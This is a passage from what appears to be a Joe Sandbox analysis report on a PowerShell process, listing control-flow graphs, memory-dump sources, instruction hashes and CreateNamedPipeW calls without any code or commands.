                                                                                                                        execution_graph 36319 8125fc8 36320 8125fdb 36319->36320 36323 8126030 36320->36323 36324 812603f 36323->36324 36325 81260a3 36324->36325 36329 81265d0 36324->36329 36335 8126628 36324->36335 36341 8126608 36324->36341 36325->36325 36332 81265d5 36329->36332 36330 812658b 36330->36325 36331 812702b CreateNamedPipeW 36330->36331 36333 812708a 36331->36333 36332->36330 36347 8126931 36332->36347 36333->36333 36336 8126632 36335->36336 36340 8126931 CreateNamedPipeW 36336->36340 36337 8126669 36337->36325 36338 812702b CreateNamedPipeW 36337->36338 36339 812708a 36338->36339 36339->36339 36340->36337 36342 812660d 36341->36342 36346 8126931 CreateNamedPipeW 36342->36346 36343 8126669 36343->36325 36344 812702b CreateNamedPipeW 36343->36344 36345 812708a 36344->36345 36345->36345 36346->36343 36350 8126959 36347->36350 36348 81269c2 36348->36330 36349 81269b5 36349->36330 36350->36348 36353 8126c69 36350->36353 36357 8126c78 36350->36357 36354 8126c78 36353->36354 36356 8126da8 36354->36356 36361 812659c 36354->36361 36356->36349 36359 8126c9e 36357->36359 36360 8126da8 36357->36360 36358 812659c CreateNamedPipeW 36358->36360 36359->36358 36359->36360 36360->36349 36362 8126f58 CreateNamedPipeW 36361->36362 36364 812708a 36362->36364 36364->36364

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 538 8427660-842769f 540 84276a5-84276e7 538->540 541 842802c-8428096 538->541 548 8427926-8427959 540->548 549 84276ed-8427786 540->549 559 8427a63-8427a79 548->559 560 842795f-84279c5 548->560 609 8427905-8427924 549->609 610 842778c-84277a7 549->610 564 8427a87-8427ab6 559->564 565 8427a7b-8427a81 559->565 604 8427a4b-8427a60 560->604 605 84279cb-84279e3 560->605 581 8427ab8-8427ad3 call 8427030 564->581 582 8427aee-8427b32 call 8427030 564->582 565->564 567 8427b35-8427b76 call 8427030 565->567 592 8427bb8-8427bdf 567->592 593 8427b78-8427ba0 567->593 597 8427beb-8427bf1 592->597 593->592 615 8427ba2-8427bad 593->615 601 8427bf3-8427c01 597->601 602 8427c07-8427c0d 597->602 601->602 619 8427ce3-8427ce9 601->619 606 8427c23-8427c2f 602->606 607 8427c0f-8427c1d 602->607 604->559 611 84279f6-8427a00 605->611 612 84279e5-84279e9 605->612 628 8427c31-8427c63 606->628 629 8427c7b-8427c87 606->629 607->606 607->619 609->548 616 84277a9-84277ad 610->616 617 84277bd-84277ca 610->617 633 8427a02-8427a08 611->633 634 8427a18-8427a1e 611->634 612->611 618 84279eb-84279ee 612->618 623 8427bb6 615->623 616->617 624 84277af-84277b5 616->624 641 84277e2-84277e8 617->641 642 84277cc-84277d2 617->642 618->611 625 8427f07-8427f0d 619->625 626 8427cef-8427d57 619->626 623->597 624->617 631 8427f13-8427f6d 625->631 632 842800d-8428014 625->632 679 8427eb0-8427ed2 626->679 680 8427d5d-8427d71 626->680 628->629 665 8427c65-8427c75 628->665 629->619 648 8427c89-8427cbb 629->648 685 8427fc3-8427fd9 631->685 686 8427f6f-8427f90 631->686 643 8427a0a 633->643 644 8427a0c-8427a0e 633->644 637 8427a20-8427a24 634->637 638 8427a2b-8427a49 634->638 637->638 647 8427a26-8427a28 637->647 638->604 638->605 645 84277f5-842780c 641->645 646 84277ea-84277ee 641->646 649 84277d6-84277d8 642->649 650 84277d4 642->650 643->634 644->634 660 8427812-8427857 645->660 661 84278f0-84278ff 645->661 646->645 653 84277f0-84277f2 646->653 647->638 648->619 673 8427cbd-8427cd3 648->673 649->641 650->641 653->645 694 84278c0-84278d5 660->694 695 8427859-8427860 660->695 661->609 661->610 665->629 673->619 679->625 682 8427e37-8427e5b 680->682 683 8427d77-8427d92 680->683 706 8427e75-8427eaa 682->706 707 8427e5d-8427e63 682->707 683->682 697 8427d98-8427dde 683->697 685->632 698 8427f92-8427f98 686->698 699 8427fa8-8427fc1 686->699 694->661 700 8427862-8427866 695->700 701 8427873-842787d 695->701 732 8427de0-8427ded 697->732 733 8427e1f-8427e35 697->733 703 8427f9a 698->703 704 8427f9c-8427f9e 698->704 699->685 699->686 700->701 709 8427868-842786b 700->709 716 8427895-842789b 701->716 717 842787f-8427885 701->717 703->699 704->699 706->679 706->680 711 8427e67-8427e73 707->711 712 8427e65 707->712 709->701 711->706 712->706 722 84278a8-84278be 716->722 723 842789d-84278a1 716->723 720 8427887 717->720 721 8427889-842788b 717->721 720->716 721->716 722->694 722->695 723->722 725 84278a3-84278a5 723->725 725->722 737 8427e05-8427e1d 732->737 738 8427def-8427df5 732->738 733->682 737->732 737->733 739 8427df7 738->739 740 8427df9-8427dfb 738->740 739->737 740->737
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (Nq
                                                                                                                        • API String ID: 0-836134488
                                                                                                                        • Opcode ID: 40e31e997fc33229c1bd53bf36dadccc2e168072e1230c82eb01c07d8c9d9cc1
                                                                                                                        • Instruction ID: 1285b3409f1b97fa5bbd6310c75a19fcf5cfdf8917f6467f0ce4f3c5343257dc
                                                                                                                        • Opcode Fuzzy Hash: 40e31e997fc33229c1bd53bf36dadccc2e168072e1230c82eb01c07d8c9d9cc1
                                                                                                                        • Instruction Fuzzy Hash: B7526D30A04219DFDB15DF68C850BAEB3B2FF88305F5485AAD9199B390DB35ED42CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 172 81265d0-81265fe 176 8126632-8126663 call 81266af call 8126931 172->176 177 8126600 172->177 197 8126669-812666e 176->197 178 8126602-8126603 177->178 179 812658b-81265a3 177->179 178->176 182 8126f58-8126fc2 179->182 185 8126fc4-8126fca 182->185 186 8126fcd-8126fd6 182->186 185->186 187 8126ff5-8126ff9 186->187 188 8126fd8-8126ff4 186->188 190 812701a-8127088 CreateNamedPipeW 187->190 191 8126ffb-8127012 187->191 188->187 194 8127091-81270cf 190->194 195 812708a-8127090 190->195 191->190 201 81270d1-81270d5 194->201 202 81270e4-81270e8 194->202 195->194 197->182 201->202 203 81270d7-81270da 201->203 204 81270ea-81270f6 202->204 205 81270f9 202->205 203->202 204->205 206 81270fa 205->206 206->206
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.278560324.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8120000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Iq
                                                                                                                        • API String ID: 0-3800572282
                                                                                                                        • Opcode ID: aac5c0bd3307ec3d3a2c4e8ca50e7b5d2dd891f9d1b75a13866036f92bda7db7
                                                                                                                        • Instruction ID: ac7eb26bd03322b74157a4773ed2b7d60b61c2b18aeea0f63523c87d2a1888c4
                                                                                                                        • Opcode Fuzzy Hash: aac5c0bd3307ec3d3a2c4e8ca50e7b5d2dd891f9d1b75a13866036f92bda7db7
                                                                                                                        • Instruction Fuzzy Hash: 5C7159B1D00318DFCB15CFA9D88879EBBF2EF89314F25856AE408AB2A1D7749844CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 410 842e507-842e57e 416 842e585-842e589 410->416 417 842e58f-842e5c8 416->417 422 842e5ce-842e5d2 call 842ed30 417->422 423 842e5d8-842e6fa 422->423 443 842e725-842e73a 423->443 444 842e6fc-842e723 423->444 447 842e73b 443->447 444->443 447->447
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <u#p$<u#p
                                                                                                                        • API String ID: 0-232911975
                                                                                                                        • Opcode ID: 1675eaad07e300091883a9dcfc9ced815692eeb06dc22a2702cc20b20fff402f
                                                                                                                        • Instruction ID: b088cbe3ff218e67b0b46797326eb2cb29a0afbb64d0f5b64c9f8c53e384d605
                                                                                                                        • Opcode Fuzzy Hash: 1675eaad07e300091883a9dcfc9ced815692eeb06dc22a2702cc20b20fff402f
                                                                                                                        • Instruction Fuzzy Hash: E771F375B40225CFC729EF38D558A5977F2AF8D215B2141BCE90ADB362DA31EC41CB40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 451 842e518-842e5d2 call 842ed30 464 842e5d8-842e6fa 451->464 484 842e725-842e73a 464->484 485 842e6fc-842e723 464->485 488 842e73b 484->488 485->484 488->488
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <u#p$<u#p
                                                                                                                        • API String ID: 0-232911975
                                                                                                                        • Opcode ID: 19c860013e05470a9f324adaa6421f18ed81b5635efc1fedbe51d7ee04981c0f
                                                                                                                        • Instruction ID: 9b28ac664add7538aa6fef8748ed35a47752db0589bbddab040fa490de8bbe3f
                                                                                                                        • Opcode Fuzzy Hash: 19c860013e05470a9f324adaa6421f18ed81b5635efc1fedbe51d7ee04981c0f
                                                                                                                        • Instruction Fuzzy Hash: 4B71F275B00225CFC729EF38D598A59B7F2AF8D215B2141B8E90ADB361DA32EC45CF40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 520 842e73d 521 842e749-842e798 520->521 523 842e7c7-842e7dc 521->523 524 842e79a-842e7c5 521->524 524->523
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <u#p$<u#p
                                                                                                                        • API String ID: 0-232911975
                                                                                                                        • Opcode ID: 16201126c36f01c861b86248b39f1107fbb458d26c5056b639bcb874f7cf5fff
                                                                                                                        • Instruction ID: 4d1e0975790e149209e56ca8724498efee699e42c0deeea1e8200dff3a3f4766
                                                                                                                        • Opcode Fuzzy Hash: 16201126c36f01c861b86248b39f1107fbb458d26c5056b639bcb874f7cf5fff
                                                                                                                        • Instruction Fuzzy Hash: B6115E71E1436EDFDB25CF20D80179EB7B1BF86300F50459AE809AB641DB70AA86CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 529 842e7df 530 842e7eb-842e83a 529->530 532 842e869-842e87e 530->532 533 842e83c-842e867 530->533 533->532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (v?r$(v?r
                                                                                                                        • API String ID: 0-1253111208
                                                                                                                        • Opcode ID: 26e2870681319bd206a6d50e69171642a7a877f6668f53ca2b0be5f84a785f78
                                                                                                                        • Instruction ID: e433f5c50cc52714cf02ce7de6f8d0cfa845bf0b7f75e9c6a98d099c99cdfe2d
                                                                                                                        • Opcode Fuzzy Hash: 26e2870681319bd206a6d50e69171642a7a877f6668f53ca2b0be5f84a785f78
                                                                                                                        • Instruction Fuzzy Hash: 84113C31E0432ACFCB18CF65D80479EB7B2BF85301F6045AAD805AB200EB759986CF40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 896 812658f-8126fc2 899 8126fc4-8126fca 896->899 900 8126fcd-8126fd6 896->900 899->900 901 8126ff5-8126ff9 900->901 902 8126fd8-8126ff4 900->902 903 812701a-8127088 CreateNamedPipeW 901->903 904 8126ffb-8127012 901->904 902->901 906 8127091-81270cf 903->906 907 812708a-8127090 903->907 904->903 911 81270d1-81270d5 906->911 912 81270e4-81270e8 906->912 907->906 911->912 913 81270d7-81270da 911->913 914 81270ea-81270f6 912->914 915 81270f9 912->915 913->912 914->915 916 81270fa 915->916 916->916
                                                                                                                        APIs
                                                                                                                        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08127078
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.278560324.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8120000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2489174969-0
                                                                                                                        • Opcode ID: c2bcf1eec9a3e3945c210ab98c0a65cef97e6ee38c4a562a53f51052bc755a29
                                                                                                                        • Instruction ID: c3875a0ab21d77033624fcd3b9249d78643f5e0e64803700c2fad7bc4ff4d24e
                                                                                                                        • Opcode Fuzzy Hash: c2bcf1eec9a3e3945c210ab98c0a65cef97e6ee38c4a562a53f51052bc755a29
                                                                                                                        • Instruction Fuzzy Hash: 99512670D00318DFDB14CFAAC984B8EBBF2AF49314F25842AE508AB2A1D7759844CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 940 8126f4d-8126fc2 942 8126fc4-8126fca 940->942 943 8126fcd-8126fd6 940->943 942->943 944 8126ff5-8126ff9 943->944 945 8126fd8-8126ff4 943->945 946 812701a-8127088 CreateNamedPipeW 944->946 947 8126ffb-8127012 944->947 945->944 949 8127091-81270cf 946->949 950 812708a-8127090 946->950 947->946 954 81270d1-81270d5 949->954 955 81270e4-81270e8 949->955 950->949 954->955 956 81270d7-81270da 954->956 957 81270ea-81270f6 955->957 958 81270f9 955->958 956->955 957->958 959 81270fa 958->959 959->959
                                                                                                                        APIs
                                                                                                                        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08127078
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.278560324.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8120000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2489174969-0
                                                                                                                        • Opcode ID: b91fa8d301f559b6bf6ce5fc2d0e141f45d3ab64c4660c97832bcfb9ab68f061
                                                                                                                        • Instruction ID: 7f83af08ce0f2d70e3168748fbf12b761e491595e937bf256f4f5fc0c2c27361
                                                                                                                        • Opcode Fuzzy Hash: b91fa8d301f559b6bf6ce5fc2d0e141f45d3ab64c4660c97832bcfb9ab68f061
                                                                                                                        • Instruction Fuzzy Hash: 8C5105B1D01319DFDB14CFA9C98478EBBB2BF49314F25842AE418AB2A0D7755984CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 918 812659c-8126fc2 921 8126fc4-8126fca 918->921 922 8126fcd-8126fd6 918->922 921->922 923 8126ff5-8126ff9 922->923 924 8126fd8-8126ff4 922->924 925 812701a-8127088 CreateNamedPipeW 923->925 926 8126ffb-8127012 923->926 924->923 928 8127091-81270cf 925->928 929 812708a-8127090 925->929 926->925 933 81270d1-81270d5 928->933 934 81270e4-81270e8 928->934 929->928 933->934 935 81270d7-81270da 933->935 936 81270ea-81270f6 934->936 937 81270f9 934->937 935->934 936->937 938 81270fa 937->938 938->938
                                                                                                                        APIs
                                                                                                                        • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08127078
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.278560324.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8120000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateNamedPipe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2489174969-0
                                                                                                                        • Opcode ID: 222bffce156b3ebf53a794239ee7922dffbf237e4f57de38278a47a1afc005e2
                                                                                                                        • Instruction ID: 8fde64b7274c17f6e5659ee1b38605580bec5287fd85fa4bfd4afb48e747ba48
                                                                                                                        • Opcode Fuzzy Hash: 222bffce156b3ebf53a794239ee7922dffbf237e4f57de38278a47a1afc005e2
                                                                                                                        • Instruction Fuzzy Hash: AE5104B1D00318DFDB14CFAAD98479EBBF2AF49314F24842AE508AB2A0D7759994CF51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (Nq
                                                                                                                        • API String ID: 0-836134488
                                                                                                                        • Opcode ID: 1fb3ef2ab7677072840db544d8003e96972b5cfb21e2d1e4b8ebedf790f565db
                                                                                                                        • Instruction ID: bc7d23e28f8c0698d8a3850cf88f380a5f30ba5f640f443d995fd3f5675e1398
                                                                                                                        • Opcode Fuzzy Hash: 1fb3ef2ab7677072840db544d8003e96972b5cfb21e2d1e4b8ebedf790f565db
                                                                                                                        • Instruction Fuzzy Hash: 06915C35A01218CFEB14DB69D844BAABBB2FF88311F1581AAD509EB391DB34AD45CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ee4c6bc9b6795f4188450221b115268f79ed631a2bed935c384dd7452d10e8a
                                                                                                                        • Instruction ID: 77024bc9b258097ac715b99706225e52871d000464215ccf06445e2e63677cab
                                                                                                                        • Opcode Fuzzy Hash: 8ee4c6bc9b6795f4188450221b115268f79ed631a2bed935c384dd7452d10e8a
                                                                                                                        • Instruction Fuzzy Hash: 2751A734B001159FDB059BA8D810BAEBAF7FF8C304F258069E505A7395CE7A9D11CBE5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 86cce391d58fe4b1202e0db7ce20d109d1b12d639c9b0071b06081753130e6cb
                                                                                                                        • Instruction ID: e8aa68df7981aa4e493284920031c8c1e66d310e15a398d77f4a2da3c6cc7ce2
                                                                                                                        • Opcode Fuzzy Hash: 86cce391d58fe4b1202e0db7ce20d109d1b12d639c9b0071b06081753130e6cb
                                                                                                                        • Instruction Fuzzy Hash: CA51A634B001159FDB059B98D810BAEBAF7FFCC304F248069E505A7399CE7AAD118BE5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 216bbddc07929e0618b7ba4fc9d17cf5573437e118cf2b694be7790c8595c683
                                                                                                                        • Instruction ID: 988c5d5ab926ad93090419f8b3615c0e392132fab43cdb000f550a0e2ea02392
                                                                                                                        • Opcode Fuzzy Hash: 216bbddc07929e0618b7ba4fc9d17cf5573437e118cf2b694be7790c8595c683
                                                                                                                        • Instruction Fuzzy Hash: 63318E39B001198FD704DBA9E840ABFB7B7EF98200F25823AD605D7355EB31ED018BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4546e149d358c7633d4140699a37c93c3faceb533b63d7d46aa3843fb21f9fe1
                                                                                                                        • Instruction ID: c6ba2665a7e67ed855553ae75f20edfb49fd0bbcfddbed4b7a25097505d253d5
                                                                                                                        • Opcode Fuzzy Hash: 4546e149d358c7633d4140699a37c93c3faceb533b63d7d46aa3843fb21f9fe1
                                                                                                                        • Instruction Fuzzy Hash: D1314234A10215CFDB08DF68C498AADBBF2FF49705F6045ACE406AB3A1CB31AC05CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 483cd7db7906199feb8360e045737fd98ac4765d50fb09b5bd3da6083d4b07c9
                                                                                                                        • Instruction ID: 8b886a841518be9ae2f962dac4778c4ad7a004addb48076ee931f35fc54cb631
                                                                                                                        • Opcode Fuzzy Hash: 483cd7db7906199feb8360e045737fd98ac4765d50fb09b5bd3da6083d4b07c9
                                                                                                                        • Instruction Fuzzy Hash: 7A11C275A00219DFD704DBA9D840BABB3B6EF98200F158639DA05D7355EB30E801CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.272472767.00000000036AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 036AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_36ad000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5544f624acaf4153d2bd9d0d6f45fb459c8507739a1e5a58c034d6c996fbf366
                                                                                                                        • Instruction ID: 4783fe63e3a046c9f95076070669be922b2f5cf0786526989429008ebb106170
                                                                                                                        • Opcode Fuzzy Hash: 5544f624acaf4153d2bd9d0d6f45fb459c8507739a1e5a58c034d6c996fbf366
                                                                                                                        • Instruction Fuzzy Hash: B801806140D3C45FD7128B258CA8752BFA8EF43624F1D80CBE9848F6A3C2695C45DB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.272472767.00000000036AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 036AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_36ad000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 90acaed132a727b04ccc1aef3293513fa295a68efd1827d0533c039bb6a4cdff
                                                                                                                        • Instruction ID: 87c31b5621531f3dc2b6083b4d1ce13b0765d6002d872d54cfd3363c0471fdc7
                                                                                                                        • Opcode Fuzzy Hash: 90acaed132a727b04ccc1aef3293513fa295a68efd1827d0533c039bb6a4cdff
                                                                                                                        • Instruction Fuzzy Hash: C801D430504744AAD710CE29DC94B6AFF98EF41664F0C8456ED450B682C27A9846DAB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 478939f7aeead5380181865215d2523c248b44b8e0c29d24089ed8d5d409dd8c
                                                                                                                        • Instruction ID: 8718df2612255951433f768a47846d2bb736cbcb4026d785b57727d1ac3f0dfb
                                                                                                                        • Opcode Fuzzy Hash: 478939f7aeead5380181865215d2523c248b44b8e0c29d24089ed8d5d409dd8c
                                                                                                                        • Instruction Fuzzy Hash: A9F062213092904FD346D77DE4246A57FA2DFC7214F1A81EFE544CF397DA698C0683A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36a8c1842368217c8a6ae2733a899bf40d466daa9bdaebb7ab66933c78e34db2
                                                                                                                        • Instruction ID: 073165000353174d83b10e0bff70ee688f8277b88e2103f6676641dd88010723
                                                                                                                        • Opcode Fuzzy Hash: 36a8c1842368217c8a6ae2733a899bf40d466daa9bdaebb7ab66933c78e34db2
                                                                                                                        • Instruction Fuzzy Hash: 25F0BD32100259ABCF52AE99D901CDA3F66FF88754B498519FA4446220C632D861AB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cdde84d9ebf68e132db6834fa6f597ba1c719e89d7f78a6756720eb90f099f8c
                                                                                                                        • Instruction ID: c2d90adb3ac0b8c1bc1ba28375537d9ed286d278160a5e0a86cb1a4e8aed5bd7
                                                                                                                        • Opcode Fuzzy Hash: cdde84d9ebf68e132db6834fa6f597ba1c719e89d7f78a6756720eb90f099f8c
                                                                                                                        • Instruction Fuzzy Hash: 1DF06536700218ABCB15566EDC145EE77ABEBC8212B05417AE906E7340DF75ED06C7A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
